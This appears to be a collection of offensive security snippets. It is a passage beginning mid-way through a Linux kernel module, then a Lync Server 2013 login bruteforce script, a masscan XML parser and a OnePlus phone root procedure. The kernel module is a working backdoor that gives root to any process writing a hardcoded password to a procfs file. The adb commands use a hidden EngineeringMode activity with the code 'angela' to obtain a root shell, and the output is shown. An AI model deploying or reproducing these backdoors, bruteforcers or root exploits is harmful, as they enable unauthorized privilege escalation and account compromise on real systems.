mymodule_write(struct file *file, const char __user *buffer, size_t count, loff_t *data)
{
        struct cred *cred;
        char *kbuf;
        int ret;

        if (count < 1)
                return -EINVAL;

        kbuf = kmalloc(count, GFP_KERNEL);
        if (!kbuf)
                return -ENOMEM;

        ret = copy_from_user(kbuf, buffer, count);
        if (!ret)
        {
                if(!strncmp(KERN_PASSWORD,(char*)kbuf, strlen(KERN_PASSWORD))){
                        cred = prepare_creds();
                        if (cred != NULL)
                        {
                                cred->uid = GLOBAL_ROOT_UID;
                                cred->gid = GLOBAL_ROOT_GID;
                                cred->suid = GLOBAL_ROOT_UID;
                                cred->euid = GLOBAL_ROOT_UID;
                                cred->euid = GLOBAL_ROOT_UID;
                                cred->egid = GLOBAL_ROOT_GID;
                                cred->fsuid = GLOBAL_ROOT_UID;
                                cred->fsgid = GLOBAL_ROOT_GID;
                                commit_creds(cred);
                        }
                        printk(KERN_WARNING "Module is installed successfully\n");
                }
        }

        kfree(kbuf);
        return count;
}

static ssize_t
mymodule_read(struct file *file, char __user *buf, size_t size, loff_t *ppos)
{
        return 0;
}

static int
mymodule_open(struct inode *inode, struct file *file)
{
        return 0;
}

static int
mymodule_procfs_attach(void)
{
        proc_root = proc_mkdir(KERN_PROCROOT, NULL);
        proc_file = proc_create(KERN_PROCFILE, KERN_PERMBITS, proc_root, &proc_fops);

        printk(KERN_INFO "proc_create successfully\n");

        if (IS_ERR(proc_file)){
                printk(KERN_ERR "proc_create failed\n");
                return -1;
        }
        return 0;
}

static int
__init mymodule_init(void)
{
        int ret;

        printk(KERN_INFO "module __init\n");

        ret = mymodule_procfs_attach();
        if(ret){
                printk(KERN_INFO "module __init failed\n ");
        }
        return ret;
}

static void
__exit mymodule_exit(void)
{
        printk(KERN_INFO "module __exit\n");

        remove_proc_entry(KERN_PROCFILE, proc_root);
        remove_proc_entry(KERN_PROCROOT, NULL);
}

module_init(mymodule_init);
module_exit(mymodule_exit);

// References
// https://elixir.bootlin.com/linux/v4.0/source/fs/proc/generic.c#L523
// https://github.com/rapid7/metasploit-framework/issues/6869
// https://github.com/allwinner-zh/linux-3.4-sunxi/blob/bd5637f7297c6abf78f93b31fc1dd33f2c1a9f76/arch/arm/mach-sunxi/sunxi-debug.c#L41
// https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10225
// https://memset.wordpress.com/2010/12/28/syscall-hijacking-simple-rootkit-kernel-2-6-x/
// https://wiki.archlinux.org/index.php/Kernel_module
// https://www.cyberciti.biz/faq/linux-how-to-load-a-kernel-module-automatically-at-boot-time/

[bruteforce] Microsoft lync server 2013

#!/usr/bin/python
# -*- coding: utf-8 -*-

# Purpose: Bruteforce Lync User.
# Product: Microoft lync server 2013
# Author : Nixawk

import requests
import base64
import logging


logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)


def lync_login(indexURI, username, password):
    boolret = False

    sapi = "%s/WebTicket/WebTicketService.svc/Auth" % indexURI

    data = ''
    data += '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
    data += '<s:Header>'
    data += '<Security s:mustUnderstand="1" xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">'
    data += '<UsernameToken>'
    data += '<Username>%s</Username>' % base64.b64encode(username)
    data += '<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText">%s</Password>' % base64.b64encode(password)
    data += '</UsernameToken>'
    data += '</Security>'
    data += '</s:Header>'
    data += '<s:Body>'
    data += '<RequestSecurityToken xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" Context="50f2ef42-a03a-fa41-fe45-b032979f3642" xmlns="http://docs.oasis-open.org/ws-sx/ws-trust/200512">'
    data += '<TokenType>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1</TokenType>'
    data += '<RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</RequestType><AppliesTo xmlns="http://schemas.xmlsoap.org/ws/2004/09/policy">'
    data += '<EndpointReference xmlns="http://www.w3.org/2005/08/addressing">'
    data += '<Address>%s/WebTicket/WebTicketService.svc/Auth</Address>' % indexURI
    data += '</EndpointReference>'
    data += '</AppliesTo>'
    data += '<Lifetime>'
    data += '<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T08:00:28Z</Created>'
    data += '<Expires xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T08:31:28Z</Expires>'
    data += '</Lifetime>'
    data += '<KeyType>http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey</KeyType>'
    data += '</RequestSecurityToken>'
    data += '</s:Body>'
    data += '</s:Envelope>'

    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "text/xml",
        "SOAPAction": "http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue",
        "Referer": "%s/Dialin/Conference.aspx" % indexURI,
    }

    try:
        sess = requests.Session()
        response = sess.post(sapi, headers=headers, data=data)

        if response is None:
            log.info("%s/%s - login failed." % (username, password))
            return boolret

        if response.status_code == 200 and "<RequestedSecurityToken>" in response.text:
            log.info("%s/%s - login successfully !" % (username, password))
            boolret = True

        log.info("%s/%s - login status: %s", username, password, response.status_code)
    except Exception as err:
        log.exception(str(err))

    return boolret


# Error Response:
# <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">a:InvalidSecurityToken</faultcode><faultstring xml:lang="zh-CN">No valid security token.</faultstring><detail><OCSDiagnosticsFault xmlns="urn:component:Microsoft.Rtc.WebAuthentication.2010" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><Ms-Diagnostics-Fault><ErrorId>28020</ErrorId><Reason>No valid security token.</Reason></Ms-Diagnostics-Fault><NameValuePairs xmlns:a="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/></OCSDiagnosticsFault></detail></s:Fault></s:Body></s:Envelope>

# Succe Response:
# <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><RequestSecurityTokenResponseCollection xmlns="http://docs.oasis-open.org/ws-sx/ws-trust/200512" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><RequestSecurityTokenResponse Context="50f2ef42-a03a-fa41-fe45-b032979f3642"><TokenType>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1</TokenType><RequestedSecurityToken><UserToken xmlns="urn:component:Microsoft.Rtc.WebAuthentication.2010">cwt=AAEBHAEFAAAAAAAFFQAAADZZRLr9wt7biZjFdLjiAACBED....eA5TnN-9Gz7aSPI</UserToken></RequestedSecurityToken><AppliesTo xmlns="http://schemas.xmlsoap.org/ws/2004/09/policy"><EndpointReference xmlns="http://www.w3.org/2005/08/addressing"><Address>https://lyncpool.example.com/</Address></EndpointReference></AppliesTo><Lifetime><Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T09:04:22.5149452Z</Created><Expires xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T09:22:28.5149452Z</Expires></Lifetime><KeySize>0</KeySize></RequestSecurityTokenResponse></RequestSecurityTokenResponseCollection></s:Body></s:Envelope>

if __name__ == '__main__':
    import sys

    if len(sys.argv) != 4:
        print("[*] python %s <lync URI> <[email protected]> <password>" % sys.argv[0])
        sys.exit(0)

    # indexURI = "https://lyncpool.example.com"
    indexURI = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]

    lync_login(indexURI, username, password)


## References
# https://msdn.microsoft.com/en-us/skype/ucwa/ucwaresources
# https://ucwa.skype.com/documentation/keytasks-createapplication
# https://msdn.microsoft.com/en-us/skype/ucwa/authenticationinucwa

$  python2.7 bruteforce_lync_server2013.py https://lyncpool.example.com "[email protected]/" "password"
INFO:__main__:[email protected]/password - login successfully !
INFO:__main__:[email protected]/password - login status: 200

[information gathering] parse masscan xml

#!/usr/bin/python
# -*- coding: utf-8 -*-


from lxml import etree


class MasscanParser(object):

    def parse_host_port_protocol(self, masscan_data=None, uniq=True):

        if not masscan_data:
            raise Exception("No report data to parse: please provide a valid XML masscan report.")

        if not isinstance(masscan_data, str):
            raise Exception("Wrong masscan_data type given as argument: cannot parse data.")

        try:
            root = etree.HTML(masscan_data)
        except:
            raise Exception("Wrong XML structure: cannot parse data.")

        host = root.xpath('//host')

        data = map(
            lambda x: (x[0][0], x[1][0][0], x[1][0][1]), # host, port, protocol
            zip(
                map(self.parse_xml_host_address, host), 
                map(self.parse_xml_port, host)
            )
        )

        if uniq: data = list(set(data))   # get unique data

        up, down, total = self.parse_xml_hostsup(root)

        print('Available: %s, Up: %s, Down: %s, Total: %s' % (
            len(data), up, down, total
        ))

        return data

    def parse_xml_host_address(self, host_tag):
        address = host_tag.xpath('address')
        return map(lambda x: x.get('addr'), address)

    def parse_xml_port(self, host_tag):
        ports = host_tag.xpath('ports/port')
        return map(lambda x: (int(x.get('portid')), x.get('protocol')), ports)

    def parse_xml_hostsup(self, root):
        hostsup = root.xpath('//hosts')

        if hostsup:
            hostsup = hostsup[0]
            return (
                hostsup.get('up'),
                hostsup.get('down'),
                hostsup.get('total')
            )
        else:
            return 0, 0, 0

    def parse_masscan_xml(self, xmlfile, uniq=True):
        import os

        if not os.path.exists(xmlfile): return []

        return self.parse_host_port_protocol(open(xmlfile).read(), uniq=uniq)


if __name__ == '__main__':
    import sys

    if len(sys.argv) != 2:
        print("[*] python %s <masscan.xml>" % sys.argv[0])
        sys.exit(0)

    msparser = MasscanParser()
    msprdata = msparser.parse_masscan_xml(sys.argv[1])

    for host, port, protocol in msprdata:
        print(host, port, protocol)

[privilege escalation] ONEPLUS phone

Tested on ONEPLUS A3010

$ adb shell getprop ro.build.version.release
7.0

$ adb shell pm list packages -f
$ adb pull /system/app/EngineeringMode/ EngineeringMode.apk
$ cd EngineeringMode.apk
$ apktool -d EngineeringMode.apk
$ grep -Ri "com.android.engineeringmode" EngineeringMode/AndroidManifest.xml

        <activity android:configChanges="keyboardHidden|orientation" android:name=".qualcomm.QualCommNvShow"/>
        <activity android:configChanges="keyboardHidden|orientation" android:excludeFromRecents="true" android:name=".qualcomm.DiagEnabled" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="com.android.engineeringmode.qualcomm.DiagEnabled"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>

$ adb shell am start -n com.android.engineeringmode/.qualcomm.DiagEnabled --es "code" "angela"
Starting: Intent { cmp=com.android.engineeringmode/.qualcomm.DiagEnabled (has extras) }
$ adb shell id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:su:s0